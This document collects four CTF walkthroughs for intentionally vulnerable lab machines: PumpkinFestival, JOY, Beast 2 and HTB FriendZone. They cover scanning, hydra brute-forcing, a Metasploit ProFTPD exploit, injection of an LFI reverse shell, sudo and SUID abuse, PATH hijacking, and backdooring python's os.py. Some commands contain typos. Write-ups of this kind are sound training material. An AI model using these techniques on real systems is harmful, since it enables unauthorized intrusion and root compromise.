Mission-Pumpkin v1.0: PumpkinFestival Vulnhub Walkthrough

PumpkinFestival is another CTF challenge from the series of Mission-Pumpkin v1.0 created by keeping beginners in mind and all credit for this VM goes to Jayanth. This level is all about collecting 10 pumpkin tokens gain the root access to collect the PumpkinFestival_Ticket.

You can download it from HERE

Level: Beginner to Intermediate

Penetrating Methodology:

1.     Scanning

·       NMAP

2.     Enumeration

·       FTP

·       WPScan

·       DirBuster

·       Enum4linux

·       Hydra

3.     Exploitation

·       SSH

4.     Privilege Escalation

·       Exploiting Sudo rights

Walkthrough:

Scanning:

Let’s start off with the scanning process. This target VM took the IP address of 192.168.1.101 automatically from our local wifi network.

Then as usual we used our favorite tool Nmap for port scanning. We found that port 21, 80 is open and ssh is running on port 6880.

nmap  -p- -A 192.168.1.101

Token 1:

Anonymous login is enabled on the ftp. So we tried to login using anonymous:anonymous.

Upon successful login we traversed through different directories and found our first token 2d6dbbae84d724409606eddd9dd71265 inside token.txt file.

ftp 192.168.1.101

cd secret

get token.txt

bye

cat token.txt

Token 2:

Port 80 is open on the target system, we opened the ip address in our browser we didn’t get aby token but got a word named Alohomera! Which might be useful later on.

We checked for the page source of the page and got our second token 

45d9ee7239bc6b0bb21d3f8e1c5faa52. 

In the page source only we also found one username Harry which we will use in the later stage.

Token 3:

In the nmap scan earlier we have  got few directories, we tried to access each one of them one by one.

From the /store/track.txt  we found one username admin and a domain name pumpkin.local.

We mapped the domain name with the target machine’s ip address in the /etc/hosts file.

After that we accessed the pumpkin.local from the browser it came out to be another wordpress site and got one more flag 06c3eb12ef2389e2752335beccfb2080.

Token 4:

There is one more directory which we got from the namp scan named /token.

We couldn’t find anything inside this directory using different directory brute forcing tool but we were still curious that there must be something inside this directory. So we did number of hit and trials and finally got our fourth token 2c0e11d2200e2604587c331f02a7ebea in token.txt.

Token 5:

Since we have a wordpress site running under pumkin.local domain name, we tried wpscan and got a file named readme.html.

wpscan –url http://pumpkin.local -e at -e ap u

  

We also got two usernames admin & morse  for the wordpress site which we will use to access the admin login of the site later on.

After accessing the url pumpkin.local/readme.html we got some code.

We tried to crack it online and it was a base62 code which gave us a password Ug0t!TrIpyJ for user morse & jack.

As we have got the password for the morse, we logged in to the wp-admin and got our 5^th token 7139e925fd43618653e51f820bc6201b

Token 6:

Since we have one more wp-admin user named admin and if you remember we also have got a keyword earlier named Alohomera! we tried this as our password to login into wordpress site and were successfully able to do so and eventually got our 6^th token f2e00edc353309b40e1aed18e18ab2c4

Token 7:

It’s always a good practice to use multiple tools for bruteforcing to get more reliable and add on results.

We used DirBuster to bruteforce the url http://pumpkin.local and got one more directory named license.txt

Accessing the same directory in the browser gave us one more token 5ff346114d634a015ce413e1bc3d8d71

Token 8:

We have a total of four users admin, morse, jack & harry with passwords only for only three.

So we tried to get the password of harry by bruteforcing using hydra. We got a password yrrah.

hydra -L user.txt -P /usr/share/wordlists/rockyou.txt 192.168.1.101 ftp -e nsr

We logged into ftp of the target machine using these credentials and found the 8^th token ba9fa9abf2be9373b7cbd9a6457f374e

ftp 192.168.1.101

ls

get token.txt

bye

cat token.txt

Token 9:

In the above screenshot you can see that there is a directory named /Donotopen ,  we went inside this directory and found another directory named /NO and after a lot of traversing we finally found the file name token.txt. We downloaded the file into our system and got the 9^th token 8d66ef0055b43d80c34917ec6c75f706    

cd Donotopen

ls

cd NO

cd NOO

cd NOOO

cd NOOOO

get token.txt

bye

cat token.txt

   

Token 10:

It’s time to get the 10^th token. Let’s HUNT!

From the above scree you might have seen there is one more directory /NOOOOO  and after some traversing found a file  a file data.txt.  We downloaded the file into our kali and found some random codes inside.

Cd NOOOOOO

bye

get data.txt

We checked for the file type and it is tar file. We untar the file and got another file data.

That file also came out to be a zip file and after unzipping we got a file key and after untaring that, we finally got a file named jack which had hexdump inside.

file data.txt

tar vxf data.txt

tar xjf data

tar vxf key

cat jack

Then we used xxd to covert and patch the hexdump into binary.

We got an ssh private key.

Xxd -r -p jack

As we have got an ssh key, what we did is we used this key to ssh login the target machine on port 6808 with user jack.

After successful login we found our final and 10^th   token 8d66ef0055b43d80c34917ec6c75f706

chmod 600 sshkey

ssh jack@192.168.1.101 -i sshkey -p 6808

file token

./token

sudo -l

Privilege Escalation/PumpkinFestival_Ticket:

From the above screenshot we can see jack has sudoer permission for alohomora file.

Now to get the root shell and then finally get the PumpkinFestival_Ticket we will exploit the sudoer permissions of jack.

We checked for the pumpkins directory but couldn’t find any, so we created a directory named pumpkins and then using echo command we created a file named alohomora with /bin/bash copied in it.

We then gave it execution permissions and tried to execute the file as sudoer and we successfully got the root shell and eventually the PumpkinFestival_Ticket which completes our challenge.

mkdir pumpkins

echo “/bin/sh” > /home/jack/pumpkins/alohomora

chmod 777/home/jack/pumkins/alohomora

id

cd /root

ls

cat PumpkinFestival_Ticket

Dgitalworld.local: JOY Vulnhub Walkthorugh

Today we have another CTF post, one more series of Dgitalworld.local named “joy” and the credits goes to Donavan. This is a boot to root challenge available on vulnhub you can download it from the given below link and the CTF is design for OSCP practices.

Download Link: https://www.vulnhub.com/entry/digitalworldlocal-joy,298/

Level: Intermidate

Task: Obtain root shell

Penetration Testing  Methodologies

Scannig

·        Nmap

Enumeration

·        FTP anonymous login

Exploit

·        Exploit ftpro using Metasploit

Privilege Escaltion

·        Sudo right

Walkthrough

Scanning

Let’s start off with the scanning process. This target VM took the IP address of 192.168.1.104 automatically from our local wifi network.

Then, as usual, we used our favorite tool Nmap for port scanning. Here we found that so many ports were opened but port 21 for ftp looks more interesting to me as anonymous login was allow on the running machine for two directories /upload /download.

Enumeration

So, we connect to ftp where here I find two directories /download and /upload. The upload directory has read and write permission whereas the /download has read permission.  So, we try to access /download directory and found a file within it name “directory”.

ftp 192.168.1.104

ls

cd /download

ls

get directory

Thus, we copied the file named as directories in our local machine.

So, by reading directory file, you will evaluate that, this file gave a brief idea about Patrick’s directory where Patrick should be the user account. In this we look at a file name “version_control”  it could be considered as a suspect. 

Since the version_control exist inside Patrick’ s directory so we cannot grab the file directly therefore I try to transfer version_control file inside /upload directory because it has read/write permission through ftp anonymous login.

telnet 192.168.1.104 21

site cpfr /home/patrick/version_control

site cpto /home/ftp/upload/version_control

Hence you can observe with the help of above command we had copied “version_control” inside /upload folder.

Further we navigate to /upload/version_control and found version of ftp service running on host machine moreover we obtained the path for webroot i.e. /var/www/tryingharderisjoy.

Exploit

So, we search for exploit for proftpd and found Metasploit module thus we execute following command to get session of the host machine.

use exploit/unix/ftp/proftpd_modcopy_exec

msf exploit(unix/ftp/proftpd_modcopy_exec) > set rhosts 192.168.1.104

msf exploit(unix/ftp/proftpd_modcopy_exec) > set SITEPATH /var/www/tryingharderisjoy.

msf exploit(unix/ftp/proftpd_modcopy_exec) > exploit

We successfully obtained the command shell of remote machine, now it was time for post enumeration to step towards privilege escalation. Thus, we import python one-liner to access proper tty shell and start with directory traversing.

It feels good when we dig-out credential of Patrick from inside the /ossec/patricsecretofjoy.

credentials for JOY:

patrick:apollo098765

root:howtheheckdoiknowwhattherootpasswordis

Privilege Escalation

Without wasting time, we switch as Patrick and check for its sudo rights if assigned for him. Here we found that Patrick can run /home/patrick/script/test as sudo user. So, when we run the test script, it gave nothing useful as it was demo to test working bash script thus the file “test” was useless but it own by root user which was doubtful for us.

So we decided to replace /test script with other malicious script but there was no writable permission on /script directory.

Thus, again we decided to use FTP anonymous login for replacing genuine /test file with bogus /test file which will be a backdoor to provide higher privilege shell.

Therefore, we created a malicious file to get bash shell with the help of command given and named as “test” then try to upload it inside /upload directory since it was writable folder.

echo "awk 'BEGIN {system(\"/bin/bash\")}'" > test

Once again with the help of telnet let’s connect to ftp service running on the host machine and execute the following command to inject malicious script “test” inside /home/Patrick/script.

telnet 192.168.1.104 21

site cpfr /home/ftp/upload/test

site cpfr /home/Patrick/script/test

So now we have injected the malicious file inside /script and user Patrick has sudo right to execute the /script/test as super user. Now let’s escalate the privilege by execute following command and finish the task assigned by author.

sudo /home/Patrick/script/test

Hmmmmm!! so we have spawn root shell successfully, now let’s move inside /root directory and grab proof.txt file and secret file.

cd /root

cat proof.txt

author-secret.txt

Beast 2: Vulnhub Walkthorugh

Today we are going to take another CTF challenge Beast:2. The credit for making this VM machine goes to “Avraham Cohen” and it is a boot2root challenge where we have to root the server and capture the flag to complete the challenge. You can download this VM here.

Security Level: Beginner

Penetrating Methodology:

1.      Scanning

·         NMAP

2.      Enumeration

·         Wireshark

3.      Exploitation

·         SSH

4.      Privilege Escalation

·         Exploiting Suid rights

Walkthrough:

Scanning:

Let’s start off with the scanning process. This target VM took the IP address of 192.168.1.102 automatically from our local wifi network.

Then as usual we used our favorite tool Nmap for port scanning. We found that ssh is open and running two ports 22 and 65022.

nmap  -p- -A 192.168.1.102

We tried to ssh the target with port 65022 and found.  It working but we don’t have the username and password yet.

So our next step is to hunt the ssh username and password

Enumeration:

All we have got is ssh service enabled on the target machine and nothing else. So what we did is we started to capture traffic of the target machine using wireshark.

We tried different filters and found something useful with udp filter.

ip.addr==192.168.1.102 && udp

We checked with udp stream and two words got our attention whiteshark & whitepointer which could be the usernames for ssh.

In another captured data packet we found the password Ch@ndr!chthye$.

Exploitation:

So far we probably have got two usernames and one password.

We tried to ssh the target with both the usernames one by one but whitepointer & Ch@ndr!chthye$ combination worked for us and we were successfully able to login the target system.

After logging in we checked for sudo rights but the user was not a sudoer.

We also checked for the suid rights for any file and found  /usr/bin/root has suid set.

ssh whitepointer@192.168.1.102 -p 65022

find / -perm -u=s  -type  f 2 >/dev/null

Privilege Escalation:

To elevate to the root shell we will exploit the suid permissions of the /usr/bin/root file. Using the strings command  we found  root file is actually running the whoami command.

We used the path variable methodology to exploit the privileges of the root file. What we did is we created a new file named whoami indside /tmp directory and put /bin/bash inside it using echo command, then gave all privileges to it. We then exported the path.

To know more about Path Variable check our article on the same HERE

So after that once we executed the /usr/bin/root file we successfully got the root shell and then also the flag.txt as anticipated.

Cd /tmp

echo “/bin/bash” > whoami

chmod 777

export PATH=/tmp:$PATH

/usr/bin/root

Cd /root

Cat flag.txt

Hack the Box: Friendzone Walkthrough

FriendZone is a recently retired CTF VM on Hack the Box with the objective – Capture the user and root flag. Hack the Box offers a wide range of VMs for practice from beginner to advanced level and it is great for penetration testers and researchers.

Level: Intermediate

Task: To find user.txt and root.txt file

Note: Since these labs are online available, therefore, they have a static IP. The IP of FriendZone is 10.10.10.123

Penetration Testing Methodologies

Scanning

·         Nmap

Enumeration

·         SMB shared Directory

·         DNS Zone Transfer

·         MySQL creds

Exploit

·         LFI to RCE

·         Capture the user flag

Privilege Escalation

·         Abusing Python Library

·         Capture the root flag

Walkthrough

Let’s start off with scanning with the nmap to check open ports.

nmap -sC -sV 10.10.10.123

From nmap scan we found so many ports are opened such as 22,53,80,443, 445 and several services were available and we noted the ssl certificate is registered as friendzone.red.

Enumeration

On exploring, vulnerable machine IP in the web browser, it welcomes us with following web page as shown below.

Here also I notice friendzone.red and this could be a clue for proceeding further. As per nmap scan result port 53 is open for TCP which means there may be some possibilities for DNS Zone Transfer.

I didn't find any other useful information on the home page, so I try to enumerate web directories with the help of DIRB. But this was also not worthwhile for us because the enumerated result was not valuable when further inspected.

Consequently, I switch to another enumeration service and it was a null session SMB enumeration. So, with the help of SMBmap, which is a Linux utility, we try to enumerate smb shared directories.

smbmap -H 10.10.10.123

I found two shared directories and among those /general had read only permissions and /Development has read/write both permissions. so, when we accessed /general directory, we obtained a text file named as “creds”.

smbmap //10.10.10.123/general

ls

get creds.txt

In this file I found following credential which could be use later.

admin:WORKWORKHhallelujah@#

First, I added friendzone.red inside /etc/hosts file but didn’t found any valuable information, therefore I enumerated sub-domain by executing following command and fetch some sub-domains which could be useful in DNS zone transfer.

Host -l friendzone.red 10.10.10.123

Further I saved /administrator1.friendzone.red.  in the /etc/hosts file for accessing this domain.

On the exploring administrator1.friendzone.red we got a login portal where I submitted the credential that we have found above.

So, we found another hint “/dashboard.php” which was a web directory.

On enumerating /dashboard.php we found following web page; here it gave a message “image_name param is missing”.

Therefore, we injected “default is image_id=a.jpg&pagename=timestamp” in the URL and obtain following web page where we notice timestamp, and this looked little suspicious towards LFI.

https://administrator1.friendzone.red/dashboard.php?image_id=b.jpg&pagename=timestamp

Exploiting LFI

To ensure that I try to call timestamp.php and by obtaining timestamp on the screen it was confirmed that it is vulnerable to LFI. Now let’s extend LFI to RCE to obtain shell of the host machine.

As we knew that /Development is the only directory that has read/write both permissions, hence we can inject our malicious file inside this directory and execute the backdoor by exploiting LFI to obtain reverse connection.

Then I have used pentest’s monkey php reverse shell with little modification such $lhost & $lport as backdoor that to be injected inside the host machine.

So, we connect to SMB with the help of smbclient and upload the php-reverse-shell inside /Development. Simultaneously we launched netcat listener in a new terminal to obtain reverse connection from the host machine.

smbclient //10.10.10.123/Development

Then execute the uploaded php backdoor with the privilege of LFI as shown below:

https://administrator1.friendzone.red/dashboard.php?image_id=b.jpg&pagename=/etc/Development/php-reverse-shell

As soon as we executed above URL in the browser, we have access netcat session and to obtain proper shell we import python pty one-liner and found our 1^st flag inside /home/friend.

With little more traversing I found credential for user “friend” from inside /var/www/mysql_data.conf

user=friend

pass=Agpyu12!0.213$

Privilege Escalation

So, with help of above enumerated creds we try to access ssh and luckily, we connected to ssh and try to identify weak permission file or role for escalating privileges to access root shell or root flag.

ssh friend@10.10.10.123

as I was fail to identify any sudo rights or SUID permission files, therefore I go for pspy64s to examine running process of the machine. Thus, I downloaded the script it inside /tmp directory and gave full permissions.

On running pspy64s, we notice that a python is executing by root which was surprising to us.

So, I decided to take a look what is script was doing, therefore I used cat command to read what this script is running.

cat /opt/server_admin/reporter.py

Hmmm! So, I didn’t find any useful operation is being executed by this script other than import a python library “os.py” hence I take it advantage in privilege escalation.

Taking privilege of python library, we can create a bogus python library named as os.py to call root flag through this file.

cd /tmp

echo “system (‘cat /root/root.txt > /tmp/flag’)” >> /usr/lib/python2.7/os.py

After sometime it will create write the root flag inside /tmp/flag as show in the below image. Thus, we have obtained root flag and finished this challenge.